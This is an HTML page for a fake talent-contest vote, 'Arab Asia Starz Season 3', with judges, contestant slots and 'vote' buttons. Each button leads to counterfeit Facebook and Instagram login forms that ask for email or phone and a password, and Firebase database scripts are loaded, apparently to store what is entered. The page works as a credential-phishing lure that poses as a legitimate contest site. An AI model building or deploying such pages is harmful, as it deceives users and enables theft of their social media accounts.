<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <script src="/js/jquery-3.6.0.min.js"></script>
  <link rel="stylesheet" href="css/index.css">
  <script src="/js/index.js"></script>
  <title>World Mai dubai Arabian Asia wildlife programme.</title>
</head>
<body>
  <div id="home">
    <header>
      <img src="/image/logo.png">
      <p align="center">
        <button id="vote2" onclick="vote()">

          Click Here To Vote

        </button><br>
        <!-- <button id="vote2" onclick="vote()">
                                                        	    Join contest
                                                        	  </button>-->
      </p>
      <hr>
      <div id="context">
        <h1 id="menu">
          menu
        </h1>
        <button id="nav">
          <img src="/image/menu.png">
        </button>
      </div>
      <hr>
    </header>
    <div id="topper">
      <img src="/image/slide1.jpg">
    </div>
    <div id="blue">
      <center>
        <h1>
          Arab Asia Starz Season 3
        </h1>
      </center>
    </div>
    <p id="news">
      Arab Asia Starz is back with Season 3! After two super-successful seasons and garnering tremendous response, Starz Media Inc & Filmfare Middle East are proud to present this much-awaited digital talent hunt once again. Bigger and better, Arab Asia Starz Season 3 kick starts its search for this region’s best talents. So if you are 18 years & above, and have a passion for fashion, beauty and entertainment, here’s a chance for you to shine!
      <br>
      The winners will be announced in May with an on-ground Grand Finale attended by celebrity judges and guests. AND WINNERS TAKE IT ALL! A second cover of Filmfare Middle East magazine, exclusive photo-shoot, cash prize and loads of gift hampers. So what are you waiting for?
      <br>
      Register NOW!
    </p>
    <div id="blue">
      <center>
        <h1>JUDGES</h1>
      </center>
    </div>
    <br>
    <center>
      <div id="people">
        <img src="/image/Rizwan.jpg" id="img1">
        <br>
        <h1>
          Rizwan Sajan
        </h1>
        <h3>
          Business Leader, Achiever, Inspirer, and Influencer!
        </h3>
        <br>
        <br>
        <img src="/image/Judge-dani.jpg" id="img2">
        <br>
        <h1>
          Dani Hiswani
        </h1>
        <h3>
          Celebrities hairstylist, Worked with celebrities from The Arab World,
          Bollywood and Hollywood, Dani succeeds in impressing everyone with his genius work when it comes to hair.
        </h3>
        <br>
        <br>
        <img src="/image/Judge-bosco.jpg" id="img3">
        <br>
        <h1>
          Bosco Martis
        </h1>
        <h3>
          Bollywood's most celebrated choreographer and now debutant director Bosco Martis has given the industry and its top stars some of their biggest dance hits
        </h3>
        <br>
        <br>
        <img src="/image/lara.jpg" id="img1">
        <br>
        <h1>
          Lara Shareef
        </h1>
        <h3>
          A fashion designer who re-defined the concept of modest fashion with her stunning and beautiful designs.
        </h3>
        <br>
        <br>
      </div>
    </center>
    <div id="blue">
      <center>
        <h1>VOTES</h1>
      </center>
    </div>
    <br>
    <div id="tag">
      fashion
    </div>
    <center>
      <div id="voter">
        <h2>contestant 001</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>
        <br>
      </div>
      <div id="voter">
        <h2>contestant 002</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>
        <br>
      </div>

      <div id="voter">
        <h2>contestant 003</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>
        <br>
      </div>
      <div id="voter">
        <h2>contestant 004</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 005</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 006</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 007</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 008</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 009</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 010</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 011</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 012</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 013</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 014</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 015</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 016</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button>  <br>
      </div>
      <div id="voter">
        <h2>contestant 017</h2>
        <video controls>
          <source src="" type="">
        </video>
        <button id="vote" onclick="vote()">
          vote this contestant
        </button><br>
      </div>
    </center>
  </div>
  <center>
    <div id="choose">
      <center>
        <p>
          Login with one of the following to vote:
        </p>
      </center>
      <center>
        <p>
          <img id="fb" onclick="fb()" src="/image/fb.png">
          <img id="ig" onclick="ig()" src="/image/ig.png">
        </p>
        <br>
        <button onclick="can()" id="cancel">Close</button>
      </center>
    </div>
  </center>
  <center>
    <div id="fbp">
      <div class="facebook-login" id="fb2" align="center">

        <div class="ggt">

          <img src="/image/fb.png" alt="logo" id="fblogo">
          <h1 id="fb2">
            facebook
          </h1>
          <input type="text" placeholder="Email or Phone number" id="fb-email"><br>
          <input type="password" placeholder="Password" id="fb-pass"><br>
          <button onclick="login()" id="fb-log">
            Log in
          </button>
        </div>
      </div>

    </div>
  </center>
  <center>
    <div id="igp">
      <div class="Instagram-login" id="ig2" align="center">

        <div class="ppt">

          <img src="/image/ig2.jpg" alt="logo" id="iglogo"><br><br>
          <br>
          <input type="text" placeholder="Username or Email" id="ig-uname"><br>
          <input type="password" placeholder="Password" id="ig-pass">
          <br>
          <button onclick="iglog()" id="ig-log">
            log in
          </button>
        </div>
      </div>
    </div>
  </center>
  <script src="https://www.gstatic.com/firebasejs/5.8.1/firebase-app.js"></script>

  <script src="https://www.gstatic.com/firebasejs/5.8.1/firebase-database.js"></script>

  <script src="https://www.gstatic.com/firebasejs/5.8.1/firebase.js"></script>
  <script src="https://raw.githubusercontent.com/firebase/firebase-bower/master/firebase-app-check.js.map"></script>

  <script src="/js/firebase.js">



  </script>
</body>
</html>